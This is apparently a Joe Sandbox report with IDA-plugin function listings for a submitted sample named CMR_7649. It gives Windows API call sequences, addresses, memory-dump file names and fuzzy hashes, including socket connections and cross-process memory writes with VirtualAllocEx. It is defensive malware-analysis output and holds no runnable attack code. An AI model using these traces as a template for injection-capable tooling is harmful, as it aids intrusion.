                                                • TrackPopupMenuEx.USER32(00A063D0,00000000,00000000,?,?,00000000), ref: 00447991
                                                Similarity
                                                • API ID: CursorMenuPopupTrack$Proc
                                                • String ID:
                                                • API String ID: 1300944170-0
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                Similarity
                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 1822080540-0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Similarity
                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 659298297-0
                                                APIs
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(00A01B20,000000F1,00000000,00000000), ref: 00440E6E
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(00A01B20,000000F1,00000001,00000000), ref: 00440E9A
                                                Similarity
                                                • API ID: Window$EnableMessageSend$LongShow
                                                • String ID:
                                                • API String ID: 142311417-0
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                • _wcslen.LIBCMT ref: 004458FB
                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                • String ID:
                                                • API String ID: 3087257052-0
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                Similarity
                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 245547762-0
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                • BeginPath.GDI32(?), ref: 0044723D
                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                Similarity
                                                • API ID: Object$Select$BeginCreateDeletePath
                                                • String ID:
                                                • API String ID: 2338827641-0
                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 4023252218-0
                                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                APIs
                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                • String ID:
                                                • API String ID: 1489400265-0
                                                • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                APIs
                                                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                • DestroyWindow.USER32(?), ref: 00455728
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                • String ID:
                                                • API String ID: 1042038666-0
                                                • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                APIs
                                                • __getptd.LIBCMT ref: 0041780F
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __getptd.LIBCMT ref: 00417826
                                                • __amsg_exit.LIBCMT ref: 00417834
                                                • __lock.LIBCMT ref: 00417844
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 2403457894-0
                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                APIs
                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                • String ID:
                                                • API String ID: 4247068974-0
                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5$8$^
                                                • API String ID: 0-3622883839
                                                • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: )$U$\
                                                • API String ID: 0-3705770531
                                                • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 708495834-557222456
                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                APIs
                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
